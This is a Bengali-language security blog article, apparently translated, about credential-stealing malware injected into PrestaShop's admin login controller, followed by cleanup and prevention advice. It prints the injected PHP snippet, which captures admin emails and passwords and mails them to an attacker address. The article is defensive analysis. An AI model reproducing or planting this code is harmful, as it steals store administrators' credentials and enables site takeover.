কম্পিউটার
 Computer >> কম্পিউটার >  >> নেটওয়ার্কিং >> নেটওয়ার্ক নিরাপত্তা

Prestashop ক্রেডেনশিয়াল স্টিলিং ম্যালওয়্যার [2021]

একটি ক্রমবর্ধমান ই-কমার্স প্ল্যাটফর্ম হিসাবে, Prestashop হ্যাকারদের জন্য একটি বিশাল লক্ষ্য যারা তথ্য চুরি করতে চায়। সাধারণত, লক্ষ্য করা হয় এমন তথ্য ক্রেডিট কার্ড নম্বর, কিন্তু সম্প্রতি, আমাদের গবেষকরা একটি নতুন ধরনের শংসাপত্র চুরির ম্যালওয়্যার আবিষ্কার করেছেন যা Prestashop সাইটগুলিকে লক্ষ্য করে এবং সাইটের অ্যাডমিন শংসাপত্রগুলি চুরি করে৷ এটি আপনার ওয়েবসাইটের সম্পূর্ণ দখল নিতে পারে৷

প্রেস্টাশপ ক্রেডেনশিয়াল স্টিলিং ম্যালওয়্যার কীভাবে কাজ করে

প্রেস্টাশপ শংসাপত্র চুরির ম্যালওয়্যার যেমন একটি ফাইলে ইনজেকশন পাওয়া গেছে ./controllers/admin/AdminLoginController.php Prestashop সাইটগুলিতে এইরকম:

public function processLogin()
   {
       /* Check fields validity */
       $passwd = trim(Tools::getValue('passwd'));
       $email = trim(Tools::getValue('email'));
$to = "admin@wsxdn.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <admin@wsxdn.com>";
$message = "Link : https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

এই কোডটি ভেরিয়েবলগুলিতে সার্ভারের তথ্য প্রেরণ করতে ব্যবহৃত হয়। পাস করা কিছু ভেরিয়েবলের মধ্যে রয়েছে Prestashop ব্যাক-এন্ডে লগ ইন করতে ব্যবহৃত ব্যবহারকারীর নাম এবং পাসওয়ার্ড। এই সংগৃহীত তথ্য মাঝে মাঝে PHP mail() function ব্যবহার করে হ্যাকারের ইমেল ঠিকানায় পাঠানো হয় .

যে ইমেলটি পাঠানো হয়েছে তাতে আক্রমণকারীর হ্যাক করা Prestashop সাইটে লগ ইন করার জন্য যা প্রয়োজন তা সবই রয়েছে৷ সেখান থেকে, তারা সাইটে অ্যাক্সেস পেতে পারে। এটি তাদের আপনার ওয়েবসাইটের ব্যাক-এন্ড ইন্টারফেসের সম্পূর্ণ অ্যাক্সেস দেয়। এর মানে হল যে তারা বিষয়বস্তু পরিবর্তন করতে পারে, জাল/সংক্রমিত মডিউল বা প্লাগইন ইনস্টল করতে পারে এবং আরও অনেক কিছু করতে পারে।

কিছু ক্ষেত্রে, এই হ্যাকের শিকার ব্যক্তিরা বাউন্স ব্যাক ইমেল পেতে শুরু করে – যা সম্ভবত Google আক্রমণ শনাক্ত করা এবং জড়িত অ্যাকাউন্টগুলিকে নিষ্ক্রিয়/রিপোর্ট করার কারণে।

আক্রমণকারী/হ্যাকিং গ্রুপ যারা এই ম্যালওয়্যার সংক্রমণ প্রচার চালাচ্ছে তাদের নাম bajatx / B4JAT4T বলে মনে করা হচ্ছে।

প্রেস্টাশপ ক্রেডেনশিয়াল চুরির ম্যালওয়্যার সংক্রমণের পরে কীভাবে আপনার সাইটটি ঠিক করবেন

1. পরিষ্কার করার আগে আপনার সাইটের একটি ব্যাকআপ নিন৷

ওয়েবসাইটটিকে অফলাইনে নেওয়ার পরামর্শ দেওয়া হয় যাতে ব্যবহারকারীরা যখন আপনি এটি পরিষ্কার করার সময় সংক্রামিত পৃষ্ঠাগুলি দেখতে না পান। সমস্ত মূল ফাইল এবং ডাটাবেসের একটি ব্যাকআপ নিতে ভুলবেন না। একটি সংকুচিত ফাইল বিন্যাসে ব্যাকআপ নেওয়া ভাল ধারণা, যেমন .zip.

2. মূল, প্লাগইন, এবং থিম ফাইলগুলি প্রতিস্থাপন করুন৷

আপনি স্বনামধন্য উত্স থেকে সংক্রামিত মূল ফাইলগুলির মূল সংস্করণগুলির সাথে প্রতিস্থাপন করতে পারেন। এই ফাইল এবং ডিরেক্টরিগুলির তাজা এবং আপডেট সংস্করণ ডাউনলোড করার পরে, আপনি পুরানোগুলি মুছে ফেলতে পারেন৷ এটি Prestashop শংসাপত্র চুরির ম্যালওয়্যার পরিষ্কার করার জন্য বিশেষভাবে গুরুত্বপূর্ণ, কারণ মূল ফাইলগুলির মধ্যে দূষিত কোড পাওয়া গেছে।

3. যেকোনো সন্দেহজনক, সম্প্রতি পরিবর্তিত ফাইলগুলি পরিষ্কার করুন।

আপনি সম্প্রতি সংশোধিত ফাইলগুলি দেখে সম্ভাব্য সংক্রমিত ফাইলগুলি খুঁজে পেতে পারেন৷ আপনি আপনার কাছে থাকা একটি পরিষ্কার ব্যাকআপ বা বিশ্বস্ত উত্স থেকে এই ফাইলগুলি পুনরুদ্ধার করতে পারেন৷

4. একটি ম্যালওয়্যার স্ক্যান চালান৷

ম্যালওয়্যার এবং দূষিত ফাইলগুলির জন্য আপনার ওয়েব সার্ভারে একটি ম্যালওয়্যার স্ক্যান চালান৷ আপনি আপনার ওয়েব হোস্ট দ্বারা প্রদত্ত cPanel-এ 'ভাইরাস স্ক্যানার' টুলটি ব্যবহার করতে পারেন, অথবা Astra Pro প্ল্যানের সাথে বিশেষজ্ঞ ম্যালওয়্যার ক্লিনআপ পেতে পারেন, যা আক্রমণকে ব্লক করে এবং চুরি করা ডেটা ডাউনলোড করার চেষ্টা করে এমন বটগুলিও।

এই পদক্ষেপগুলি ছাড়াও, আপনি Prestashop নিরাপত্তা সংক্রান্ত এই নিবন্ধটিকে সহায়ক মনে করতে পারেন৷

কীভাবে আরও আক্রমণ প্রতিরোধ করা যায়

আপনার সাইট ঠিক করার পরে, এখানে কয়েকটি ভাল নিরাপত্তা অনুশীলন রয়েছে যা অনুসরণ করার জন্য আপনার ওয়েবসাইটটি Prestashop শংসাপত্র চুরির ম্যালওয়্যার থেকে নিরাপদ থাকে তা নিশ্চিত করে:

  • নিশ্চিত করুন যে আপনি আপনার সফ্টওয়্যারের সর্বশেষ আপডেট চালাচ্ছেন
  • বিশ্বস্ত তৃতীয় পক্ষের পেমেন্ট প্রসেসর ব্যবহার করুন
  • নিয়মিত ম্যালওয়্যার স্ক্যান/নিরাপত্তা অডিট সম্পাদন করুন
  • ফায়ারওয়ালে বিনিয়োগ করুন

হ্যাকারদের ক্রমবর্ধমান পদ্ধতি থেকে আপনার ওয়েবসাইটকে রক্ষা করার একমাত্র নিশ্চিত উপায় হল নিরাপত্তায় বিনিয়োগ করা। একটি ওয়েবসাইট ফায়ারওয়ালে বিনিয়োগ করা, ঘন ঘন ম্যালওয়্যার স্ক্যান চালানো এবং নিয়মিত নিরাপত্তা অডিট করা একটি দুর্দান্ত ধারণা কারণ এটি আপনাকে আপনার ওয়েবসাইটের সামগ্রিক নিরাপত্তা সম্পর্কে একটি দুর্দান্ত ধারণা দিতে পারে।


  1. কীভাবে ওয়ার্ডপ্রেস জাভাস্ক্রিপ্ট ম্যালওয়্যার রিমুভাল করবেন

  2. PrestaShop “XsamXadoo” ম্যালওয়ারের বিরুদ্ধে একটি সতর্কতা জারি করেছে

  3. ম্যালওয়্যার:এমন একটি যুদ্ধ যা আমরা কখনও চাইনি

  4. একটি স্মার্ট টিভি ভাইরাস নাকি ম্যালওয়্যার আছে?